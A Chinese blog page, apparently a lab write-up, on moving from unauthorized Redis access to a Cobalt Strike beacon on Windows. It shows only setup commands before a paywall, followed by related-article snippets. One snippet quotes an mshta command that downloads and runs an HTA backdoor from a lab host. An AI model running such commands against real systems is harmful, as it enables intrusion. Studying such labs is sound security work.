记一次实验:redis未授权到cs上线(windows)

最新推荐文章于 2024-05-14 16:26:07 发布
最新推荐文章于 2024-05-14 16:26:07 发布
阅读量1.4k 收藏 3
点赞数
文章标签: redis windows 渗透测试 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_43875708/article/details/113506439
版权

文章目录

简介

cs服务器:192.168.43.113(kali)
cs客户端兼攻击机:192.168.43.101(win10)
靶机:192.168.43.42(win7)

前期准备

kali搭建cs服务器

sudo ./teamserver 192.168.43.113 yuchi123

在这里插入图片描述

win10启动cs客户端

在这里插入图片描述
在这里插入图片描述

探测靶机开放端口

nmap.exe 192.168.43.42 -p 6379

在这里插入图片描述

攻击步骤

最低0.47元/天 解锁文章
内网渗透-cobaltstrike之cs上线获取shell
lza20001103的博客
04-30 8791
cobaltstrike之cs上线获取shell
内网渗透-Windows内网渗透
lza20001103的博客
08-15 2572
内网渗透-Windows内网渗透 文章目录内网渗透-Windows内网渗透前言一、信息收集1.1、SPN1.2、端口连接1.3、配置文件1.4、用户信息1.6、会话收集1.7、凭据收集navicat:SecureCRT:Xshell:WinSCP:VNC:1.8、DPAPI1.9、域信任1.10、域传送1.11、DNS录获取1.12、WIFI1.13、GPP1.14、Seatbelt1.15、Bloodhound1.16、Exchange1.16.1 邮箱用户密码爆破1.16.3 信息收集二、传输通道2.
未授权内网redisCS上线
pyth0zn的博客
04-18 366
redis,shiro,内网渗透
Redis_CS
KevinJee_
12-03 149
服务器端 服务器端的命令为: redis-server 可以使⽤help查看帮助⽂档 redis-server --help 个人习惯 ps aux | grep redis 查看redis服务器进程 sudo kill -9 pid 杀死redis服务器 sudo redis-server /etc/redis/redis.conf 指定加载的配置文件 客户端 客户端的命令为: redis...
csWindows上马
weixin_45682070的博客
12-15 401
设置监听 生成http application后门 选择powershell脚本 然后把生成的evil.hta文件上传到cs服务器上 这时已经挂在cs服务器/download目录下 如果有命令执行漏洞,执行mshta+刚才生成的路径 mshta http://192.168.17.181:80/download/file.ext 然后就获得一个shell,只适用win ......
Windows提权_CS提权上线
weixin_39953838的博客
01-04 2016
许多过往之人事,可想可念不可急。
红蓝对抗之Windows内网渗透
Tencent_SRC的博客
06-29 6437
无论是渗透测试,还是红蓝对抗,目的都是暴露风险,促进提升安全水平。企业往往在外网布置重兵把守,而内网防护相对来说千疮百孔,所以渗透高手往往通过攻击员工电脑、外网服务、职场WiFi等方式进...
红队内网攻防渗透:内网渗透之内网各种工具平台的使用
HACKONE的博客
04-10 1190
红队内网攻防渗透内网各种工具平台的使用 内网各种工具平台的使用
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 6120
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
免杀制作-教你如何一键制作window-CS上线免杀马(新手推荐)
weixin_42109829的博客
10-20 7637
一、免杀思路 应该说每一类型的恶意软件所实施的反检测技术都是不一样的(恶意软件可以分为病毒、木马、僵尸程序、流氓软件、勒索软件、广告程序等),虽然本文会对所有相关的反检测技术都进行介绍,但我们还是会将注意力放在stager阶段的meterpreter这种有效载荷的工具上,因为几乎所有的恶意软件的攻击命令的执行都必须依靠 meterpreter来实施攻击,例如: 提权、凭证窃取、进程迁移、注册表操作和分配更多的后续攻击, 另外,MetasploitFramework是一个缓冲区溢出测试使用的辅助工具,也可以说
文件cs上线主机及攻击使用ping工具
weixin_51387754的博客
05-05 608
Hancitor’s Use of Cobalt Strike and a Noisy Network Ping Tool 执行摘要 Hancitor是一种信息窃取程序和恶意软件下载程序,被指定为MAN1,Moskalvzapoe或TA511的威胁参与者使用。在2018年的威胁简介中,我们指出Hancitor相对不成熟,但在未来数年中仍将是威胁。大约三年后,Hancitor仍然是一种威胁,并且已经演变为使用Cobalt Strike之类的工具。最近几个月,该参与者开始使用网络ping工具来帮助枚举受感染主机
redis未授权访问--覆盖windows版本以及linux版本
markecheng的博客
10-21 1001
我又回来了,之前一段时间忙于升学,以及离职这些事,所以停更了,现在好了^ ^ 一、漏洞简介 redis是一个开源的数据库。并且目前在很多方面都会使用到redis,但是redis因为配置不当,可以产生未授权访问漏洞,redis未授权访问漏洞利用方式很多,可以写入webshell,或者拿主机权限(上线cs)等等,以下我们降价windows版本以及linux版本redis常用的利用方式 二、利用方式 windows版: 上线cs拿主机权限 linux版本: 给root账户写入SSH公钥文件,直接通过SSH免密码登
CS木马的几种上线方式总结
热门推荐
Shanfenglan's blog
10-20 13万+
CATALOG前言windows相关上线方式1.利用mshta与wmic上线2.利用powershell上线3.利用msbuild上线linux相关上线方式1.利用Cross2上线linux主机 前言 CS上线方式还是有不少的,但是时间长不看容易忘一部分,博客录也比较分散导致找起来比较麻烦,因此写了这篇博客录一下CS上线的相关知识点。 windows相关上线方式 1.利用mshta与wmic上线 不用powershell执行powershell脚本与xsl文件不落地上线 2.利用powershell上
内网安全-代理Socks协议&CS-MSF控制上线
m0_65336233的博客
12-19 2056
内网安全-代理Socks协议&路由不出网&后渗透通讯&CS-MSF控制上线
Redis 漏洞总结
qq_41696518的博客
06-26 3423
其实漏洞的原理无外乎就2点:1. 能连接Redis,这是利用的前提。2. linux一切皆文件,要利用的服务可通过修改文件内容达成。
网络安全工具汇总(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Java癫疯的博客
05-14 2079
网络安全工具汇总(非常详细)零基础入门到精通,收藏这一篇就够了
CS不出网各种上线姿势
不曾扬帆,何以至远方
07-08 1686
CS不出网的各种上线姿势
Redis【第二篇总结】
wang_luwei的博客
09-01 444
文章目录一、Nosql与Redis概述二、Redis6安装与使用三、常用五大数据类型3.1、Redis key操作3.2、Redis字符串(String)3.3、Redis列表(List)3.4、Redis集合(Set)3.5、Redis哈希(Hash)3.6、Redis有序集合(Zset)四、Redis6配置文件详解五、Redis6的发布和订阅六、Redis6新数据类型6.1、Bitmaps6.2、HyperLogLog6.3、Geospatial七、Jedis操作Redis6八、Redis6与Sprin
//基于redisTemplate工具类RedisHelper
一名系统架构师的征途
03-04 2727
package com.tgb.util.redis;import java.util.List;import java.util.Map;import java.util.Set;import java.util.concurrent.TimeUnit;import org.springframework.data.redis.core.RedisTemplate;import org.spri...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值